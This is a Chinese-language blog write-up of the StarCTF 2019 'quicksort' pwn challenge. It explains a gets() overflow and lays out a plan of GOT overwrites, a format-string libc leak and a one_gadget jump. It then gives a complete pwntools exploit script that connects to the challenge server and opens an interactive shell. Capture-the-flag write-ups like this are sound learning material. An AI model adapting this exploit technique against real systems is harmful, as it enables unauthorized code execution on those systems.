Starctf2019_Quicksort

挺简单的一题…但是我的利用思路…可能有些曲折..

Start

binary

Anaylsis

漏洞点很简单…gets…我第一眼居然没看到以为是类型设置错误…

1
2
3
4
5
6
7
for ( i = 0; i < size; ++i )
{
printf("the %dth number:", i + 1);
gets(&s);
tmp = &ptr[i];
*tmp = (int *)atoi(&s);
}

可以覆盖掉其他东西…
然后学弟写了一会…表示不知道咋利用…我就接手了交flag的活…

利用思路

我的可能比较奇特…改成了fmt漏洞

  • hijack stack_chk_fail_got =====>main
  • hijack free_got =====>printf
  • fmtstr =====>leak libc
  • one_gadget

    exp

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    from pwn import *
    context.log_level = 'debug'
    context.arch = 'i386'
    #context.terminal = ['tmux', 'sp', '-h']
    local = 1
    if 0:
    p = process('./quicksort')
    else:
    p=remote("34.92.96.238",10000)
    elf = ELF('./quicksort')
    g = lambda x: next(elf.search(asm(x)))
    ret = g('ret') # 0x8048816
    puts_plt = elf.plt['puts'] # 0x8048560
    puts_got = elf.got['puts'] # 0x804a02c
    free_got = elf.got['free'] # 0x804a018
    printf = elf.plt['printf'] #
    func = 0x08048816
    stack_chk_fail_got = elf.got['__stack_chk_fail']
    setbuf_got = elf.got['setbuf']


    def write(addr, val, t):
    payload = str(val)
    payload += (0x10 - len(payload)) * '\x00'
    payload += p32(t)
    payload += (0x1C - len(payload)) * '\x00'
    payload += p32(addr)
    p.recvuntil('number:')
    p.sendline(payload)

    def overflow(addr, val, t):
    payload = str(val)
    payload += (0x10 - len(payload)) * '\x00'
    payload += p32(t)
    payload += (0x1C - len(payload)) * '\x00'
    payload += p32(addr) + '\x00' * 4
    p.recvuntil('number:')
    p.sendline(payload)
    bss=0x0804a000+0x800
    p.recvuntil('sort?\n')
    t = 2
    p.sendline(str(t))
    write(free_got, printf, 2)
    overflow(stack_chk_fail_got, 0x8048816, 1)

    p.recvuntil('sort?\n')
    p.sendline(str(t))
    overflow(bss, 1881420837, 1)
    p.readuntil("37 \n")
    base=int(p.read(0xa),16)-(0xf7791000-0xf75df000)
    log.warning(hex(base))
    #gdb.attach(p, 'b *0x80489bf')
    one=0x3ac62+base
    p.recvuntil('sort?\n')
    p.sendline(str(t))
    write(stack_chk_fail_got, one&0xffff, 2)
    overflow(stack_chk_fail_got+2, (one&0xffff0000)>>16, 1)


    p.interactive()
Author: n132!
Link: https://n132.github.io/2019/04/29/2019-04-29-Starctf2019-Quicksort/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.